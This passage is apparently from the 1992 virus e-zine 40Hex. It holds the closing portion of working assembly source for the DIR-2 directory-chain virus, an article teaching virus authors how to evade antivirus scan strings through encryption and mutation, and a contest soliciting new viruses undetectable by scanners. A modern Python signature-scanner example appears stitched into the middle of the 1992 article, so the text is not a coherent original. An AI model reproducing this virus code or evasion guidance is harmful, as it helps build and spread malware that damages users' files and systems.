mov dx,[si] push ds push si call write ; Update the FAT pop si pop ds jnz _read_ ; Quit if there's an error call driver cmp [si],dx jne _read_ dec ax dec ax mul cx ; Multiply by sectors/cluster ; to find the sector of the ; write add ax,di adc dx,0 push es pop ds mov word ptr [bx+12h],2 ; Byte/sector count mov [bx+14h],ax ; Starting sector # test dx,dx jz less mov word ptr [bx+14h],-1 ; Flag extended partition mov [bx+1ah],ax ; Handle the sector of the mov [bx+1ch],dx ; extended partition less: mov [bx+10h],cs ; Transfer address segment mov [bx+0eh],100h ; and the offset (duh) call write ; Zopy ourselves! ; (We want to travel) _read_: std lea di,[bx+1ch] ; Restore device driver header mov cx,8 ; from the stack load: pop ax stosw loop load _read: call in_ ; Call original device handler mov cx,9 _inf_sec: mov di,es:[bx+12h] ; Bytes/Sector lds si,es:[bx+0eh] ; DS:SI = pointer to buffer sal di,cl ; Multiply by 512 ; DI = byte count xor cl,cl add di,si ; Go to address in the buffer xor dl,dl ; Flag for an infection in ; function find push ds push si call find ; Infect the directory jcxz no_inf call write ; Write it back to the disk and es:[bx+4],byte ptr 07fh ; Clear error bit in status ; word no_inf: pop si pop ds inc dx ; Flag for a decryption in ; function find call find ; Return right information to ; calling program jmp ppp ;--------Subroutines find: mov ax,[si+8] ; Check filename extension cmp ax,"XE" ; in directory structure jne com cmp [si+10],al je found com: cmp ax,"OC" jne go_on cmp byte ptr [si+10],"M" jne go_on found: test [si+1eh],0ffc0h ; >4MB ; Check file size high word jnz go_on ; to see if it is too big test [si+1dh],03ff8h ; <2048B ; Check file size low word jz go_on ; to see if it is too small test [si+0bh],byte ptr 1ch ; Check attribute for subdir, jnz go_on ; volume label or system file test dl,dl ; If none of these, check DX jnz rest ; If not 0, decrypt pointer: mov ax,1234h ; mov ax, XX modified elsewhere cmp ax,[si+1ah] ; Check for same starting 
; cluster number as us je go_on ; If it is, then try another xchg ax,[si+1ah] ; Otherwise make it point to ; us. gad: xor ax,1234h ; Encrypt their starting ; cluster mov [si+14h],ax ; And put it in area reserved ; by DOS for no purpose loop go_on ; Try another file rest: xor ax,ax ; Disinfect the file xchg ax,[si+14h] ; Get starting cluster xor ax,word ptr cs:gad+1 ; Decrypt the starting cluster mov [si+1ah],ax ; and put it back go_on: db 2eh,0d1h,6 ; rol cs:[gad+1], 1 dw offset gad+1 ; Change encryption and add si,32 ; go to next file cmp di,si ; If it is not past the end of jne find ; the buffer, then try again ret ; Otherwise quit check: mov ah,[bx+1] ; ah = unit code (block device ; only) drive: cmp ah,-1 ; cmp ah, XX can change. ; Compare with the last call ; -1 is just a dummy ; impossible value that will ; force the change to be true mov byte ptr cs:[drive+2],ah ; Save this call's drive jne changed ; If not the same as last call ; media has changed push [bx+0eh] ; If it is the same physical ; drive, see if floppy has ; been changed mov byte ptr [bx+2],1 ; Tell original driver to do a call in_ ; media check (block only) cmp byte ptr [bx+0eh],1 ; Returns 1 in [bx+0eh] if pop [bx+0eh] ; media has not been changed mov [bx+2],al ; Restore command code changed: ret ; CF,ZF set if media has not ; been changed, not set if ; has been changed or we don't ; know write: cmp byte ptr es:[bx+2],8 ; If we want OUTPUT, go to jae in_ ; original device handler ; and return to caller mov byte ptr es:[bx+2],4 ; Otherwise, request INPUT mov si,70h mov ds,si ; DS = our segment modify: mov si,1234h ; Address is changed elsewhere push [si] push [si+2] mov [si],offset i13pr mov [si+2],cs call in_ ; Call original device handler pop [si+2] pop [si] ret driver: mov word ptr es:[bx+12h],1 ; One sector in_: ; in_ first calls the strategy ; of the original device ; driver and then calls the ; interrupt handler db 09ah ; CALL FAR PTR str_block: dw ?,70h ; address db 09ah ; CALL FAR PTR 
int_block:      dw ?,70h                ; address
                test es:[bx+4],byte ptr 80h ; Was there an error?
                ret

convert:        cmp ax,0ff0h            ; 0FFF0h if 12 bit FAT
                jae fat_16              ; 0FF0h = reserved cluster
                mov si,3                ; 12 bit FAT
                xor word ptr cs:[si+gad-1],si ; Change the encryption value
                mul si                  ; Multiply by 3 and
                shr ax,1                ; divide by 2
                mov di,0fffh            ; Mark it EOF (low 12 bits)
                jnc cont                ; if it is even, continue
                mov di,0fff0h           ; otherwise, mark it EOF (high
                jmp short cont          ; 12 bits) and then continue
fat_16:         mov si,2                ; 16 bit FAT
                mul si                  ; Double cluster #
                mov di,0ffffh           ; Mark it as end of file
cont:           mov si,512
                div si                  ; AX = sector number
                                        ; (relative to start of FAT)
                                        ; DX = offset in sector AX
header:         inc ax                  ; Increment AX to account for
                ret                     ; boot record

counter:        dw 0
                dw 842h                 ; Attribute
                                        ; Block device
                                        ; DOS 3 OPEN/CLOSE removable
                                        ; media calls supported
                                        ; Generic IOCTL call supported
                                        ; Supports 32 bit sectors
                dw offset main          ; Strategy routine
                dw offset rts           ; Interrupt routine (rtf)
                db 7fh                  ; Number of subunits supported
                                        ; by this driver. Wow, lookit
                                        ; it -- it's so large and juicy

; Parameter block format:
;  0 WORD  Segment of environment
;  2 DWORD pointer to command line
;  6 DWORD pointer to 1st default FCB
; 10 DWORD pointer to 2nd default FCB
param:          dw 0,80h,?,5ch,?,6ch,?
bpb_buf:        db 32 dup(?)
f_name:         db 80 dup(?)

;--------The End.
dir_2           ends
                end start

MsDos
-------------------------------------------------------------------------------

40Hex Number 6 Volume 2 Issue 2                                       File 00B

                         ------------------------------
                           SCAN STRINGS, HOW THEY WORK,
                              AND HOW TO AVOID THEM
                         ------------------------------
                                  By Dark Angel
                         ------------------------------

Scan strings are the scourge of the virus author and the friend of anti-virus
wanna-bes. The virus author must find encryption techniques which can
successfully evade easy detection. This article will show you several such
techniques.

Scan strings, as you are well aware, are a collection of bytes which an
anti-viral product uses to identify a virus.
The important thing to keep in mind is that these scan strings represent actual
code and can NEVER contain code which could occur in a "normal" program. The
trick is to use this to your advantage.

When a scanner checks a file for a virus, it searches for the scan string, which
could be located ANYWHERE IN THE FILE. The scanner doesn't care where it is.
Thus, a file which consists solely of the scan string and nothing else would be
detected as infected by a virus. A scanner is basically an overblown "hex
searcher" looking for 1000 signatures. Interesting, but there's not much you can
do to exploit this. The only thing you can do is to write code so generic that
it could be located in any program (by chance).

Try creating a file with the following debug script and scanning it. This
demonstrates the fact that the scan string may be located at any position in
the file.

---------------------------------------------------------------------------
n marauder.com
e 0100 E8 00 00 5E 81 EE 0E 01 E8 05 00 E9
rcx
000C
w
q
---------------------------------------------------------------------------

Although scanners normally search for decryption/encryption routines, in
Marauder's case SCAN looks for the "setup" portion of the code, i.e., setting
up BP (to the "delta offset"), calling the decryption routine, and finally
jumping to program code.

What you CAN do is either minimise the scannable code or have the code
constantly mutate into something different. The reasons are readily apparent.

The simplest technique is having multiple encryption engines. A virus utilising
this technique has a database of encryption/decryption engines and uses a random
one each time it infects. For example, there could be various forms of XOR
encryption or perhaps another form of mathematical encryption. The trick is to
simply replace the code for the encryption routine each time with the new
encryption routine. Mark Washburn used this in his V2PX series of virii.
In it, he used six different encryption/decryption algorithms, and some
mutations are impossible to detect with a mere scan string. More on those
later.

Recently, there has been talk of the so-called MTE, or mutating engine, from
Bulgaria (where else?). It utilises the multiple encryption engine technique.
Pogue Mahone used the MTE and it took McAfee several days to find a scan
string. Vesselin Bontchev, the McAfee-wanna-be of Bulgaria, marvelled at the
engineering of this engine. It is distributed as an OBJ file designed to be
linked into any virus. Supposedly, SCANV89 will be able to detect any virus
using the encryption engine, so it is worthless except for those who have an
academic interest in such matters (such as virus authors).

There is, however, a serious limitation to the multiple encryption technique,
namely that scan strings may still be found. The difference is that a scan
string must be isolated for each different encryption mechanism. An additional
benefit is the possibility that the antivirus software developers will miss
some of the encryption mechanisms, so not all the strains of the virus will be
caught by the scanner.

Now we get to a much better (and sort of obvious) method: minimising scan code
length. There are several viable techniques which may be used, but I shall
discuss only three of them.

The one mentioned before, which Mark Washburn used in V2P6, was interesting.
He first filled the space reserved for the encryption mechanism with dummy
one-byte op-codes such as CLC, STC, etc. As you can see, the flag manipulation
op-codes were exploited. Next, he randomly placed the parts of his encryption
mechanism in parts of this buffer, i.e., the gaps between the "real"
instructions were filled in with random dummy op-codes. In this manner, no
generic scan string could be located for this encryption mechanism of this
virus. However, the disadvantage of this method is the sheer size of the code
necessary to perform the encryption.
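To make the scanner side of this concrete, here is an added example (not code from the article, McAfee or any scanner): a minimal signature matcher that, like the "hex searcher" described above, searches a whole buffer and also supports wildcard positions, run over constructed sample buffers. The 16-byte XOR-loop skeleton, its assumed 16-bit x86 encoding and the sample offsets are constructed for this illustration, not taken from any real string list.

```python
"""Minimal wildcard signature scanner (added example, not the article's code)."""
from typing import Dict, List, Optional, Tuple

# A signature is a list of byte values; None is a wildcard ("??") that
# matches any byte, the way a scanner accepts a variable byte in a string.
Signature = List[Optional[int]]


def parse_signature(text: str) -> Signature:
    """Turn 'BE ?? ?? B9' style hex text into a Signature."""
    return [None if tok == "??" else int(tok, 16) for tok in text.split()]


def find_signature(data: bytes, sig: Signature) -> int:
    """Offset of the first match of sig anywhere in data, or -1.

    The whole buffer is searched, so where the bytes sit in the file is
    irrelevant, which is exactly the point the article makes.
    """
    n = len(sig)
    for off in range(len(data) - n + 1):
        if all(s is None or data[off + i] == s for i, s in enumerate(sig)):
            return off
    return -1


def scan(data: bytes, sigs: Dict[str, str]) -> List[Tuple[str, int]]:
    """Run every named signature over data; return (name, offset) hits."""
    hits = []
    for name, text in sigs.items():
        off = find_signature(data, parse_signature(text))
        if off >= 0:
            hits.append((name, off))
    return hits


# Constructed samples: a 16-byte XOR-loop skeleton in assumed 16-bit x86
# encoding (mov si,imm / mov cx,imm / xor word ptr cs:[si],imm / add si,2 /
# loop).  Only the immediates differ between A and B, and the skeleton sits
# at a different offset inside filler bytes in each.
SAMPLE_A = (b"\x90" * 5
            + bytes.fromhex("BE 0B 01 B9 64 00 2E 81 34 5A A5 83 C6 02 E2 F6")
            + b"\x00" * 4)
SAMPLE_B = (b"\xCC" * 17
            + bytes.fromhex("BE 22 02 B9 C8 00 2E 81 34 3C 77 83 C6 02 E2 F6")
            + b"\x00")
CLEAN = b"\x90" * 8 + b"Hello, world\r\n$" + b"\xCC" * 8   # no skeleton here

SIGS = {
    # Exact string lifted from SAMPLE_A: breaks as soon as an immediate changes.
    "exact":    "BE 0B 01 B9 64 00 2E 81 34 5A A5 83 C6 02 E2 F6",
    # Wildcarded string: pins the skeleton, ignores the immediates.  The cost
    # is fewer fixed bytes, so the false-positive risk on clean code goes up.
    "wildcard": "BE ?? ?? B9 ?? ?? 2E 81 34 ?? ?? 83 C6 02 E2 ??",
}


def demo() -> Dict[str, List[Tuple[str, int]]]:
    """Scan the three constructed buffers; returns {buffer_name: hits}."""
    return {name: scan(buf, SIGS)
            for name, buf in (("A", SAMPLE_A), ("B", SAMPLE_B), ("clean", CLEAN))}


if __name__ == "__main__":
    for name, hits in demo().items():
        print(f"{name:5}: {hits or 'no match'}")
```

The exact string only hits buffer A, while the wildcarded one hits both A (offset 5) and B (offset 17) and neither hits the clean buffer, which is why a scanner that tolerates variable bytes is harder to shake off than a plain hex search.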
A second method is much simpler than this and possibly just as effective. To
minimise scan code length, all you have to do is change certain bytes at
various intervals. The best way to do this can be explained with the following
code fragment:

        mov     si, 1234h               ; Starting location of encryption
        mov     cx, 1234h               ; Virus size / 2 + variable number
loop_thing:
        xor     word ptr cs:[si], 1234h ; Decrypt the value
        add     si, 2
        loop    loop_thing

In this code fragment, all the values which can be changed are set to 1234h
for the sake of clarity. Upon infection, all you have to do is set these
variable values to whatever is appropriate for the file. For example, the
first mov si, 1234h would have to be changed to have the encryption start at
wherever the virus would be loaded into memory (huh?). Ponder this for a few
moments and all shall become clear. To substitute new values into the code,
all you have to do is something akin to:

        mov     [bp+scratch+1], cx

where scratch is an instruction. The exact value to add to scratch depends on
the coding of the op-code. Some op-codes take their argument as the second
byte, others take the third. Regardless, it will take some tinkering before it
is perfect.

In the above case, the "permanent" code is limited to under five or six bytes.
Additionally, these five or six bytes could theoretically occur in ANY PROGRAM
WHATSOEVER, so it would not be prudent for scanners to search for these
strings. However, scanners often use scan strings with wild-card-ish scan
string characters, so it is still possible for a scan string to be found.

The important thing to keep in mind when using this method is that it is best
for the virus to use separate encryption and decryption engines. In this
manner, shorter decryption routines may be found and thus shorter scan strings
will be needed. In any case, using separate encryption and decryption engines
increases the size of the code by at most 50 bytes.

The last method detailed is theft of decryption engines.
Several shareware products utilise decryption engines in their programs to
prevent simple "cracks" of their products. This is, of course, not a deterrent
to any programmer worth his salt, but it is useful for virus authors. If you
combine the method above with this technique, the scan string would identify
the product as being infected with the virus, which is a) bad PR for the
company and b) unsuitable for use as a scan string. This technique requires
virtually no effort, as the decryption engine is already written for you by
some unsuspecting PD programmer.

All the methods described are viable scan string avoidance techniques suitable
for use in any virus. After a few practice tries, scan string avoidance should
become second nature and will help tremendously in prolonging the effective
life of your virus in the wild.

40Hex Number 6 Volume 2 Issue 2                                       File 00C

                         ------------------------
                             Virus Contest!
                           'The Spammies(tm)'
                         ------------------------

Deadline: July 4th, 1992

This is the first PHALCON/SKISM virus contest. As a matter of fact, this is
the first contest of its kind. We believe that it will motivate you to produce
more original code, rather than more hacks. Winners may have already won
$10,000,000, as well as the prestige of winning the first ever 'Spammie'
awards.

Rules and Regulations:

 1) All submissions must be original source code. (no hacks)
 2) Only one submission is allowed per programmer, plus one group project.
 3) All viruses must be received by us before July 4th, 1992.
 4) Viruses must be accompanied by a complete entry form. (see below)
 5) The original, compilable, commented source MUST be included, along with
    an installer program, or a dropper, in the case of boot block viruses.
 6) Entries must include a location where the author may be contacted, such
    as an email address or a BBS.
 7) Personnel or persons related to personnel of PHALCON/SKISM are not
    eligible.
 8) The source must compile without error under Tasm or Masm (please specify
    what assembler and version you used, along with the necessary command
    line switches). If we cannot compile your virus, it will be disqualified.
 9) All entries receive a free subscription to 40hex. (hehehehe)
10) The entry must be uploaded privately to the sysop, stating that it is a
    contest entry.
11) The viruses must not be detectable by the current version (as of
    July 4th) of any known virus scanner.
12) Viruses will be judged by our 'panel of experts' in three categories.
    12.1) Stealth
    12.2) Size
    12.3) Reproductivity
    12.4) Performance
    For example, Red Cross is an example of a 'high performance' virus. It
    was entertaining and well done.

*** Entry Form

Handle            ________________________
Group Affiliation ______________
Virus Name        ____________________
Size              ____bytes (if you need more spaces, go away)

Type
 ___ File Infector
 ___ Boot block

Infection method
 ___ Direct Action
 ___ Memory Resident
 ___ Directory chain
 ___ Other (please describe it in detail)

Encryption routine
 ___ None (bah)
 ___ Xor loop
 ___ Other (please describe it in detail)

Describe what makes your infection routine unique.
_______________________________________________________________________________
_______________________________________________________________________________

Describe what makes your encryption routine unique.
_______________________________________________________________________________
_______________________________________________________________________________

Describe what means your virus uses, other than encryption, to keep itself
hidden.
_______________________________________________________________________________
_______________________________________________________________________________

What is the largest possible scan string for this virus? __bytes

What else sets this virus apart from other viruses?
_______________________________________________________________________________ _______________________________________________________________________________ _______________________________________________________________________________